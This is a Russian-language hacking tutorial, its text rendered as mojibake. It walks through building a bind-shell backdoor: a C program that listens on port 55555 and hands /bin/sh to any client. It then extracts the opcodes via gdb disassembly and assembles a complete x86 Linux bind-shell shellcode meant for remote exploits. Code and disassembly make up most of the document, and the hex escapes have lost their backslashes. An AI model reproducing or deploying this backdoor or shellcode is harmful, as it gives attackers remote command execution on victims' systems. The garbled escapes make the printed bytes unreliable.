×òî òàêîå Port-shell, ÿ äóìàþ âû çíàåòå: ýòî ïðîãðàììà, êîòîðàÿ îòêðûâàåò äîñòóï ê øåëëó íà îïðåäåëåííîì ïîðòó. Çàïóñòèâ òàêóþ ïðîãðàììó, âû ñìîæåòå ïîäñîåäèíÿòüñÿ ê óäàëåííîìó õîñòó è âûïîëíÿòü ëþáûå êîìàíäû íà ýòîé óäàëåííîé ìàøèíå, ñ òåìè ïðèâèëåãèÿìè, ñ êîòîðûìè áûëà çàïóùåííà äàííàÿ ïðîãðàììà.
Âîîáùå, íà íàïèñàíèå äàííîé ñòàòüè ìåíÿ òîëêíóëà îäíà ñòàòüÿ. Äåëî â òîì, ÷òî îíè ïèñàëè î backdoor'e, êîòîðûé çàïèñûâàë â /etc/passwd íîâûé àêêàóíò ñ ïðèâèëåãèÿìè ðóòà (uid=0; gid=0) ïðè ïîñûëêå îïðåäåëåííîé êîìàíäû íà îïðåäåëåííûé ïîðò. Ìíå æå íå î÷åíü ïîíðàâèëàñü ýòà èäåÿ, òàê êàê ê óäàëåííîìó êîìïüþòåðó íåâîçìîæíî áûëî áû ïîäñîåäèíèòüñÿ, åñëè áû íà íåì îòñòóòñâîâàëè òàêèå óòèëèòû êàê telnetd, sshd è ò.ï. Íåáûëî áû òîëêó îò ýòîãî áýêäîðà ïðè èõ îòñòóòñâèè, ïîýòîìó íóæåí øåëë. Âîò ìû è ïðèìèìñÿ çà åãî íàïèñàíèå.
Ñàì êîä ïðîãðàììû íå î÷åíü áîëüøîé, òàê êàê ïðîãðàììà âñåãî-íàâñåãî îòêðûâàåò íóæíûé íàì ïîðò è çàïóñêàåò îáîëî÷êó, âûõîä êîòîðîé ñèíõðîíèçèðîâàí ñ äåñêðèïòîðîì ñîêåòà:
//âñå íóæíûå è íå íóæíûå èíêëóäû
int soc,cli;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;
int main()
{
if(fork()==0)
{
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(55555);
soc=socket(AF_INET,SOCK_STREAM,0);
bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
listen(soc,1);
cli=accept(soc,(struct sockaddr *)&cli_addr,sizeof(cli_addr));
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execl("/bin/sh","sh",0);
}
}
âîò è âåñü êîä =). Íî ýòî åùå íå âñå. Äàííûé êîä î÷åíü óäîáíî èñïîëüçîâàòü äëÿ íàïèñàíèÿ remote exploits. Âñå ÷òî íóæíî - ïåðåâåñòè äàííûé êîä â àññåìáëåðíûé è âûòàùèòü ÎÏÊÎÄ. Ýòèì ìû è çàéìåìñÿ: ïîëüçîâàòüñÿ ìû áóäåì gdb, èòàê, ïîåõàëè:
(gdb) disas dup2
Dump of assembler code for function dup2:
0x804cbe0 : movl %ebx,%edx
0x804cbe2 : movl 0x8(%esp,1),%ecx
0x804cbe6 : movl 0x4(%esp,1),%ebx
0x804cbea : movl $0x3f,%eax
0x804cbef : int $0x80
0x804cbf1 : movl %edx,%ebx
0x804cbf3 : cmpl $0xfffff001,%eax
0x804cbf8 : jae 0x804cdc0 <__syscall_error>
0x804cbfe : ret
0x804cbff : nop
End of assembler dump.
(gdb) disas fork
Dump of assembler code for function fork:
0x804ca90 : movl $0x2,%eax
0x804ca95 : int $0x80
0x804ca97 : cmpl $0xfffff001,%eax
0x804ca9c : jae 0x804cdc0 <__syscall_error>
0x804caa2 : ret
0x804caa3 : nop
0x804caa4 : nop
0x804caa5 : nop
0x804caa6 : nop
0x804caa7 : nop
0x804caa8 : nop
0x804caa9 : nop
0x804caaa : nop
0x804caab : nop
0x804caac : nop
0x804caad : nop
0x804caae : nop
0x804caaf : nop
End of assembler dump.
(gdb) disas socket
Dump of assembler code for function socket:
0x804cda0 : movl %ebx,%edx
0x804cda2 : movl $0x66,%eax
0x804cda7 : movl $0x1,%ebx
0x804cdac : leal 0x4(%esp,1),%ecx
0x804cdb0 : int $0x80
0x804cdb2 : movl %edx,%ebx
0x804cdb4 : cmpl $0xffffff83,%eax
0x804cdb7 : jae 0x804cdc0 <__syscall_error>
0x804cdbd : ret
0x804cdbe : nop
0x804cdbf : nop
End of assembler dump.
(gdb) disas bind
Dump of assembler code for function bind:
0x804cd60 : movl %ebx,%edx
0x804cd62 : movl $0x66,%eax
0x804cd67 : movl $0x2,%ebx
0x804cd6c : leal 0x4(%esp,1),%ecx
0x804cd70 : int $0x80
0x804cd72 : movl %edx,%ebx
0x804cd74 : cmpl $0xffffff83,%eax
0x804cd77 : jae 0x804cdc0 <__syscall_error>
0x804cd7d : ret
0x804cd7e : nop
0x804cd7f : nop
End of assembler dump.
(gdb) disas listen
Dump of assembler code for function listen:
0x804cd80 : movl %ebx,%edx
0x804cd82 : movl $0x66,%eax
0x804cd87 : movl $0x4,%ebx
0x804cd8c : leal 0x4(%esp,1),%ecx
0x804cd90 : int $0x80
0x804cd92 : movl %edx,%ebx
0x804cd94 : cmpl $0xffffff83,%eax
0x804cd97 : jae 0x804cdc0 <__syscall_error>
0x804cd9d : ret
0x804cd9e : nop
0x804cd9f : nop
End of assembler dump.
(gdb) disas accept
Dump of assembler code for function __accept:
0x804cd40 <__accept>: movl %ebx,%edx
0x804cd42 <__accept+2>: movl $0x66,%eax
0x804cd47 <__accept+7>: movl $0x5,%ebx
0x804cd4c <__accept+12>: leal 0x4(%esp,1),%ecx
0x804cd50 <__accept+16>: int $0x80
0x804cd52 <__accept+18>: movl %edx,%ebx
0x804cd54 <__accept+20>: cmpl $0xffffff83,%eax
0x804cd57 <__accept+23>: jae 0x804cdc0 <__syscall_error>
0x804cd5d <__accept+29>: ret
0x804cd5e <__accept+30>: nop
0x804cd5f <__accept+31>: nop
End of assembler dump.
ñàì ÎÏÊÎÄ äëÿ êàæäîé èç ýòèõ ôóíêöèé âûãëÿäèò ñëåäóþùèì îáðàçîì:
dup2(cli,0)
----------------------------------------------------------------------
char code[]=
"x88xc3" /* movb %al,%bl */
"xb0x3f" /* movb $0x3f,%al */
"x31xc9" /* xorl %ecx,%ecx */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
fork()
----------------------------------------------------------------------
ñhar code[]=
"x31xc0" /* xorl %eax,%eax */
"xb0x02" /* movb $0x2,%al */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
socket(2,1,6)
----------------------------------------------------------------------
ñhar code[]=
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"x89xf1" /* movl %esi,%ecx */
"xb0x02" /* movb $0x2,%al */
"x89x06" /* movl %eax,(%esi) */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x06" /* movb $0x6,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x01" /* movb $0x1,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
bind(soc,(struct sockaddr *)&serv_addr,0x10)
----------------------------------------------------------------------
ñhar code[]=
"x89xf1" /* movl %esi,%ecx */
"x89x06" /* movl %eax,(%esi) */
"xb0x02" /* movb $0x2,%al */
"x66x89x46x0c" /* movw %ax,0xc(%esi) */
"xb0x77" /* movb $0x77,%al */
"x66x89x46x0e" /* movw %ax,0xe(%esi) */
"x8dx46x0c" /* leal 0xc(%esi),%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x89x46x10" /* movl %eax,0x10(%esi) */
"xb0x10" /* movb $0x10,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x02" /* movb $0x2,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
listen(soc,1)
----------------------------------------------------------------------
char code[]=
"x89xf1" /* movl %esi,%ecx */
"x89x06" /* movl %eax,(%esi) */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x04" /* movb $0x4,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
accept(soc,0,0)
----------------------------------------------------------------------
char code[]=
"x89xf1" /* movl %esi,%ecx */
"x89xf1" /* movl %eax,(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x05" /* movb $0x5,%bl */
"xcdx80"; /* int $0x80 */
----------------------------------------------------------------------
Òåïåðü ñîåäèíÿåì âñå ýòî âîåäèíî è äîáàâëÿåì ê ýòîìó âûçîâ ñàìîãî øåëà - ïîëó÷àåì ñëåäóþùóþ áàéäåíü:
char shellcode[]=
"x31xc0" /* xorl %eax,%eax */
"xb0x02" /* movb $0x2,%al */
"xcdx80" /* int $0x80 */
"x85xc0" /* testl %eax,%eax */
"x75x43" /* jne 0x43 */
"xebx43" /* jmp 0x43 */
"x5e" /* popl %esi */
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"x89xf1" /* movl %esi,%ecx */
"xb0x02" /* movb $0x2,%al */
"x89x06" /* movl %eax,(%esi) */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x06" /* movb $0x6,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x01" /* movb $0x1,%bl */
"xcdx80" /* int $0x80 */
"x89x06" /* movl %eax,(%esi) */
"xb0x02" /* movb $0x2,%al */
"x66x89x46x0c" /* movw %ax,0xc(%esi) */
"xb0x77" /* movb $0x77,%al */
"x66x89x46x0e" /* movw %ax,0xe(%esi) */
"x8dx46x0c" /* leal 0xc(%esi),%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x89x46x10" /* movl %eax,0x10(%esi) */
"xb0x10" /* movb $0x10,%al */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x02" /* movb $0x2,%bl */
"xcdx80" /* int $0x80 */
"xebx04" /* jmp 0x4 */
"xebx55" /* jmp 0x55 */
"xebx5b" /* jmp 0x5b */
"xb0x01" /* movb $0x1,%al */
"x89x46x04" /* movl %eax,0x4(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x04" /* movb $0x4,%bl */
"xcdx80" /* int $0x80 */
"x31xc0" /* xorl %eax,%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x89x46x08" /* movl %eax,0x8(%esi) */
"xb0x66" /* movb $0x66,%al */
"xb3x05" /* movb $0x5,%bl */
"xcdx80" /* int $0x80 */
"x88xc3" /* movb %al,%bl */
"xb0x3f" /* movb $0x3f,%al */
"x31xc9" /* xorl %ecx,%ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f,%al */
"xb1x01" /* movb $0x1,%cl */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f,%al */
"xb1x02" /* movb $0x2,%cl */
"xcdx80" /* int $0x80 */
"xb8x2fx62x69x6e" /* movl $0x6e69622f,%eax */
"x89x06" /* movl %eax,(%esi) */
"xb8x2fx73x68x2f" /* movl $0x2f68732f,%eax */
"x89x46x04" /* movl %eax,0x4(%esi) */
"x31xc0" /* xorl %eax,%eax */
"x88x46x07" /* movb %al,0x7(%esi) */
"x89x76x08" /* movl %esi,0x8(%esi) */
"x89x46x0c" /* movl %eax,0xc(%esi) */
"xb0x0b" /* movb $0xb,%al */
"x89xf3" /* movl %esi,%ebx */
"x8dx4ex08" /* leal 0x8(%esi),%ecx */
"x8dx56x0c" /* leal 0xc(%esi),%edx */
"xcdx80" /* int $0x80 */
"x31xc0" /* xorl %eax,%eax */
"xb0x01" /* movb $0x1,%al */
"x31xdb" /* xorl %ebx,%ebx */
"xcdx80" /* int $0x80 */
"xe8x5bxffxffxff"; /* call -0xa5 */
Íè÷åãî íå ïîíÿòíî? Ïîïðîáóéòå ïðîäåëàòü ýòî íà ñâîåé ìàøèíå è ïðèâåñòè ê ïîäîáíîìó âèäó. Êñòàòè, êàê âèäèòå, êîä íàïèñàí ïîä Ëèíóêñ, ïîïðîáóéòå åãî ïåðåäåëàòü ïîä BSD.